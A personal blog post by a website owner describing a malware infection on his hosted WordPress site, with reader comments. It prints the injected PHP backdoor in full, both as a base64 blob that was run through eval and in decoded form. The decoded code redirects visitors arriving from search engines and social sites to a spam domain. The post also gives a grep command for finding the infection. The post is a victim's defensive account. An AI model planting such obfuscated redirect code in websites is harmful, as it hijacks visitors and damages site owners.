Damn you Hackers!!! Go to Hell!!!

So today, I noticed my another hack that’s been installed on my machine. I have to say ever since my move to GoDaddy.com, my site has been hacked over and over again. This is number #3. The reason why I posted about this one is because it is actually pretty interesting and finding what was done was like a mystery. So let me tell you a quick story.

So this evening I was trying to figure out how to get my project 365 page to post automatically to my website. This is when I first noticed a slowdown and issue when I am using the debugger from Facebook. At first I thought it was the wordpress plug in, but it occasionally works. I got everything ready, and posted my first auto post and strange things started to happen.

As I stated, everything looked normal at first until I click on the links provided by Facebook. When I click on the Facebook link to my website, it goes to some spam site. At first I thought it was the .htaccess hack that was I received a while back, but that is not the case. Then I thought maybe it was a DNS hack. That was also not the case, finally, I found the following in all my .php files on my web server.

It uses eval command and nested with base64_decode the following block of code.

DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVS
RVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICgh
c3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0
cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQu
bHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5k
ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgi
L2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlz
cGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3Ry
aXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNl
bGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ

it is quite clever. It is encoded and people may easily over look it, but when you decode the text this is what you get

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER[‘HTTP_REFERER’];
$uag=$_SERVER[‘HTTP_USER_AGENT’];
if ($uag) {
if (!stristr($uag,”MSIE 7.0″)){
if (stristr($referer,”yahoo”) or stristr($referer,”bing”) or stristr($referer,”rambler”) or stristr($referer,”gogo”) or stristr($referer,”live.com”)or stristr($referer,”aport”) or stristr($referer,”nigma”) or stristr($referer,”webalta”) or stristr($referer,”begun.ru”) or stristr($referer,”stumbleupon.com”) or stristr($referer,”bit.ly”) or stristr($referer,”tinyurl.com”) or preg_match(“/yandex\.ru\/yandsearch\?(.*?)\&lr\=/”,$referer) or preg_match (“/google\.(.*?)\/url\?sa/”,$referer) or stristr($referer,”myspace.com”) or stristr($referer,”facebook.com”) or stristr($referer,”aol.com”)) {
if (!stristr($referer,”cache”) or !stristr($referer,”inurl”)){
header(“Location: http://minkof.sellclassics.com/”);
exit();
}
}
}
}
}

Tricky huh?

So well… solution? remove all code in all .php files and with a little help from “grep” I was able to locate all the bad codes.

grep -H -r ‘eval(base64_decode’ ./

So, Go To Hell You Punk Hackers!!! I hope you guys get busted and become someone’s bitch in prison.

minhsao

Just a guy inside the Mintrix

4 Comments

Rebecca

Wow that’s scary! Are you going to change to a different host? I hope my website never gets hacked!

Reply
minhsao

I am on such a good deal with GoDaddy right now, it is very hard for me to change. I will ride this out until the end of my current contract and move host. Meanwhile, I got to put my degree to some use, right?

Reply
Kim

thank you SO much for posting this. The same thing has been happening to my website; only on facebook. I am technically challenged so I need to forward your advice to someone with some knowledge. I do appreciate you posting it though.

Reply
minhsao

My advice is to change your password ASAP to your blog account and then start looking for the bad scripts. Your hosting service may have a way to see what files have been changed. It is only on facebook, it is probably exactly the same problem that I had.

Reply

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.